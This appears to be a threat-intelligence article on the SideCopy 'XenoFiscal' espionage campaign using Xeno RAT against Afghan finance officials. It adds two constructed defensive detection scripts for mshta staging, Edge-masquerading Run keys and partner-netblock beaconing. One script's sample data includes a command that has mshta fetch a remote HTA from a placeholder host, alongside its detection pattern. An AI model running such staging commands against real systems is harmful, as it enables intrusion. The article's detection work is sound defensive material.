A Pakistan-aligned threat cluster tracked as SideCopy, a subgroup of Transparent Tribe (APT36), has been running a sustained espionage campaign against Afghanistan's Ministry of Finance and provincial government employees since at least May 2025, according to Seqrite researchers whose findings were reported by Dark Reading on June 4. The operation, dubbed XenoFiscal, leans on Xeno RAT, an open-source remote access trojan that has become a staple of the regional cyber-espionage scene. The campaign uses standard tradecraft: spear-phishing lures themed around budgets, payroll, and inter-ministerial correspondence, ZIP archives containing malicious LNK files disguised as PDFs, and staged delivery through mshta-fetched HTA payloads decoded in memory. Once installed, Xeno RAT provides a remote shell, file exfiltration, keystroke capture, and the ability to chain in additional payloads.
What makes XenoFiscal worth the attention of defenders well outside Kabul is not the malware. Xeno RAT is freely available on GitHub. The interesting parts are the decoy, the infrastructure, and the operational discipline. Seqrite documented a decoy document containing a staff directory of Afghan Ministry of Finance employees, with names and mobile numbers of high-ranking officials across all 34 provinces. LNK filenames and lures were written in Pashto, the language native to the Pashtun population from which the Taliban draws its base, signaling a targeting layer that goes beyond casting a wide net.
Infrastructure abuse inside a sovereign IP block
The most notable evasion choice was the C2 hosting. The attackers placed their remote payload on a compromised domain inside the IP address space of Afghanistan's Ministry of Communication and Information Technology, sitting alongside more than 200 legitimate government and education sites. Outbound traffic from a finance ministry workstation to a ministry of communications subnet looks, to almost any defender, like normal interagency business. Persistence on the host was implemented through a Windows registry run key masquerading as a Microsoft Edge process, and the final Xeno RAT build carried a hardcoded C2 pointing at a bulletproof hosting provider in Bulgaria.
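Two of the host-side tells in that paragraph, the mshta stage pulling a remote HTA and a Run key borrowing Edge branding, are cheap to hunt for once you have process-creation and registry-set telemetry. The script below is an added illustration written for this article, not code from Seqrite or from the Xeno RAT project. The event format (`key=value|key=value` records), the sample events, and the Edge install directories are all constructed assumptions; a real deployment would read Sysmon or EDR events and substitute the gold-image paths for its own fleet.

```python
"""Constructed example: flag mshta-staged remote HTA execution and Run-key
persistence that masquerades as Microsoft Edge, over toy telemetry records.
Event format, sample values and install paths are assumptions for illustration."""
import re
from typing import Callable, Dict, List, Optional

# Directories where a genuine Edge binary lives on a default 64-bit install.
# Assumption: substitute the paths from your own gold image.
LEGIT_EDGE_DIRS = (
    "c:\\program files (x86)\\microsoft\\edge\\application\\",
    "c:\\program files\\microsoft\\edge\\application\\",
)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
# mshta.exe handed an http(s) URL is the remote-HTA staging pattern described above.
REMOTE_MSHTA_RE = re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.I)

# Constructed telemetry: two process creations, three Run-key writes.
SAMPLE_EVENTS = [
    "type=process_create|image=C:\\Windows\\System32\\mshta.exe|cmdline=mshta.exe http://staging.example.invalid/budget/report.hta",
    "type=process_create|image=C:\\Windows\\System32\\mshta.exe|cmdline=mshta.exe C:\\Users\\Public\\local.hta",
    "type=registry_set|target=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftEdgeUpdate|details=\"C:\\Users\\Public\\Libraries\\msedge.exe\"",
    "type=registry_set|target=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Edge|details=\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window",
    "type=registry_set|target=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive|details=\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'key=value|key=value' record into a dict (constructed format)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def image_from_command(cmd: str) -> str:
    """Return the executable path from a command line, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def check_run_key(ev: Dict[str, str]) -> Optional[str]:
    """Run-key value that uses Edge branding but launches a binary outside the Edge install dir."""
    if ev.get("type") != "registry_set" or not RUN_KEY_RE.search(ev.get("target", "")):
        return None
    value_name = ev["target"].rsplit("\\", 1)[-1].lower()
    image = image_from_command(ev.get("details", "")).lower()
    looks_like_edge = "edge" in value_name or "msedge" in image
    if looks_like_edge and not image.startswith(LEGIT_EDGE_DIRS):
        return f"Run key '{value_name}' masquerades as Edge but launches {image}"
    return None


def check_mshta(ev: Dict[str, str]) -> Optional[str]:
    """mshta.exe launched with a remote URL argument (HTA fetched over the network)."""
    if ev.get("type") != "process_create":
        return None
    cmdline = ev.get("cmdline", "")
    if REMOTE_MSHTA_RE.search(cmdline):
        return f"mshta.exe fetching a remote HTA: {cmdline}"
    return None


CHECKS: List[Callable[[Dict[str, str]], Optional[str]]] = [check_run_key, check_mshta]


def triage(lines: List[str]) -> List[str]:
    """Run every check over every record and collect the alert strings."""
    alerts: List[str] = []
    for line in lines:
        ev = parse_event(line)
        for check in CHECKS:
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

The legitimate Edge Run entry and the local-HTA launch pass through silently; only the remote fetch and the `msedge.exe` living under a user-writable Libraries folder are raised. The path allowlist is the part worth maintaining: an entry named after a browser whose binary is anywhere else is the cheap, high-confidence signal.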
Seqrite's own framing is worth quoting directly. "While the operation does not introduce new malware techniques, it demonstrates a mature and deliberate approach to defense evasion, persistence, and operational security," the researchers wrote. "The sophistication lies more in the execution, targeting, and orchestration of proven methods than in any single technical innovation." That is the part operators outside the region should internalize. Modern state-aligned activity increasingly looks like good project management around commodity components, not exotic zero-days.
Why Kabul's defenses make commodity malware enough
The strategic story matters as much as the technical one. Afghanistan's public sector has been a high-value target for regional intelligence services since the Taliban takeover in 2021. The digital infrastructure now defended by the Taliban (mobile networks, fiber backbones, biometric databases, ministry portals) was largely built between 2001 and 2021 with foreign aid money. The current government inherited that footprint without inheriting the budgets, vendor relationships, or trained staff that kept it patched. Seqrite notes that Afghanistan's cyber resilience faces structural pressure from economic isolation, limited access to international cybersecurity partnerships, difficulty retaining skilled personnel, and constraints on technology modernization. In that environment, an attacker does not need a custom implant. A maintained fork of an open-source RAT is sufficient to collect months of financial planning data, donor flows, and currency reserve movements.
Afghan defenders are working with a sparse toolset. Patch cadence on Windows endpoints is slow, EDR coverage is limited, email security gateways are often legacy or absent, and visibility into outbound traffic is minimal. None of those gaps are unique to Kabul. They describe the security posture of mid-sized public sector bodies and NGOs across most of South and Central Asia, and a meaningful share of the partner ecosystem that multinational banks, donors, and humanitarian logistics providers rely on every day.
Spillover risk for banks, donors, and logistics partners
For CTOs and VPEs outside the immediate target set, the relevance is twofold. First, commodity RATs that mature inside state campaigns rarely stay there. Xeno RAT has already been seen in financially motivated intrusions across South Asia and the Gulf, and the toolchain typically diffuses into criminal markets within a quarter or two of state use. Detection content built today against Xeno RAT loaders, registry persistence keys disguised as browser processes, mshta-staged HTA execution chains, and C2 patterns that abuse trusted neighbor infrastructure will pay off when the same code base shows up inside an MSP compromise affecting one of our suppliers. Second, the targeting pattern intersects directly with the partner ecosystems of multinational banks, payment processors, donor-funded programs, and humanitarian logistics providers. Compromise of a finance ministry is also, in practice, compromise of every counterparty that exchanges payment files or budget projections with it.
There is also a procurement signal here that boards should not miss. Bulletproof hosting in Bulgaria, compromised domains inside a sovereign IP block, and Pashto-language lure crafting all cost money. Not much, but enough that the operators are paying for capability rather than improvising. Pakistan-Afghanistan hostilities have escalated through 2025, and intelligence collection on Kabul's fiscal position, including donor disbursement schedules and reserve movements, has obvious value for any neighbor weighing economic pressure or border policy.
What we are telling clients to fund this quarter
Bruno Digital's read for our clients: stop treating commodity RAT detections as low-severity noise. We are advising security and platform leaders to do four concrete things this quarter. First, fund a focused threat-hunting sprint against open-source RAT families (Xeno RAT, AsyncRAT, Quasar, DcRAT), with hunt queries built from current SideCopy and Transparent Tribe reporting. Second, instrument outbound traffic to detect C2 hosted on trusted neighbor infrastructure, not just on known bad IPs; geographic and ASN co-location with legitimate partners is now a tradecraft signal, not a false-positive driver. Third, require third-party risk reviews for any vendor with operations in South Asia or the Gulf to attest to EDR coverage and LNK and HTA execution controls, and price the contract accordingly when they cannot. Fourth, allocate budget (we recommend a floor of 50,000 to 150,000 dollars per critical supplier tier) to fund EDR licensing and managed detection for partners that handle payment files or identity data on our behalf. The cheapest way to keep Xeno RAT out of our network is to pay for it to stay out of theirs.
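The second recommendation is the one most network teams get backwards: a destination inside a partner's address space is usually what gets a connection suppressed. The script below is an added example for this article, not tooling from Seqrite or any vendor named here. It inverts that logic: a flow to a trusted counterparty's netblock that does not land on an enumerated, sanctioned service endpoint is scored up, not down, and a regular connection cadence adds a second reason. The netblocks are RFC 5737 documentation ranges standing in for a partner ministry and a partner bank, the endpoint allowlist and the flow records are constructed, and the beaconing threshold is an assumed tuning value.

```python
"""Constructed example: treat co-location with trusted partner infrastructure as a
signal. Netblocks are RFC 5737 placeholders, endpoints and flows are made up,
and the beacon-regularity threshold is an assumed tuning parameter."""
import ipaddress
import statistics
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Placeholder address space of trusted counterparties (documentation ranges).
PARTNER_NETBLOCKS = {
    "partner-ministry (placeholder)": ipaddress.ip_network("198.51.100.0/24"),
    "partner-bank (placeholder)": ipaddress.ip_network("203.0.113.0/24"),
}
# The only hosts inside those blocks that finance workstations have business with.
SANCTIONED_ENDPOINTS: Set[Tuple[str, int]] = {("198.51.100.20", 443), ("203.0.113.7", 443)}


@dataclass
class Flow:
    src_host: str
    dst_ip: str
    dst_port: int
    timestamps: List[float]  # connection start times in seconds, ascending


# Constructed flow summaries for three finance workstations.
SAMPLE_FLOWS = [
    # Sanctioned tax portal, human-driven irregular timing: should stay quiet.
    Flow("fin-ws-01", "198.51.100.20", 443, [0, 45, 310, 1200, 1260, 4000]),
    # Unlisted host inside the partner ministry block, ~300 s cadence.
    Flow("fin-ws-07", "198.51.100.133", 443, [0, 300, 602, 899, 1201, 1500, 1798]),
    # Non-partner destination with a flat 600 s cadence.
    Flow("fin-ws-03", "192.0.2.55", 443, [0, 600, 1200, 1800, 2400, 3000]),
]


def partner_block_for(ip: str) -> Optional[str]:
    """Name of the partner netblock containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for name, net in PARTNER_NETBLOCKS.items():
        if addr in net:
            return name
    return None


def is_regular_beacon(timestamps: List[float], max_cv: float = 0.15, min_connections: int = 6) -> bool:
    """True when inter-connection gaps are nearly constant (low coefficient of variation)."""
    if len(timestamps) < min_connections:
        return False
    gaps = [later - earlier for earlier, later in zip(timestamps, timestamps[1:])]
    mean_gap = statistics.mean(gaps)
    if mean_gap <= 0:
        return False
    return statistics.pstdev(gaps) / mean_gap <= max_cv


def score_flow(flow: Flow) -> List[str]:
    """Return the reasons a flow deserves analyst attention (empty list = nothing to see)."""
    reasons: List[str] = []
    block = partner_block_for(flow.dst_ip)
    sanctioned = (flow.dst_ip, flow.dst_port) in SANCTIONED_ENDPOINTS
    if block and not sanctioned:
        # The inversion: sitting next to legitimate partner services is a reason to look, not to suppress.
        reasons.append(f"unsanctioned host inside {block}; co-location with a trusted partner is a tradecraft signal")
    if is_regular_beacon(flow.timestamps):
        reasons.append("periodic connection cadence consistent with C2 beaconing")
    return reasons


def triage(flows: List[Flow]) -> Dict[str, List[str]]:
    """Map each source host to its list of reasons."""
    return {flow.src_host: score_flow(flow) for flow in flows}


if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_FLOWS).items():
        status = "REVIEW" if reasons else "ok"
        print(f"{host}: {status}")
        for reason in reasons:
            print("   -", reason)
```

The workstation talking to the sanctioned portal on an irregular schedule produces nothing; the one beaconing to an unlisted address in the partner ministry's block produces two reasons, and the one beaconing outside any partner range produces one. Maintaining the sanctioned-endpoint list is the operational cost of this approach, but it is exactly the list a finance team can produce, because those are the counterparties it exchanges payment files with.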
The threshold to watch is the next quarterly threat report from Seqrite, CrowdStrike, or Mandiant covering Q3 2026. If Xeno RAT detections in commercial enterprise telemetry climb past the diffusion pattern we saw with AsyncRAT in 2023, where state use preceded criminal adoption by roughly six months, expect the same RAT, the same loaders, and the same C2 tradecraft to land inside Western financial supply chains by year end. If those detections stay flat, SideCopy has kept tooling discipline tighter than its peers and the urgency drops a notch. Either outcome is actionable. Pretending the distinction between state and criminal tradecraft still holds is not.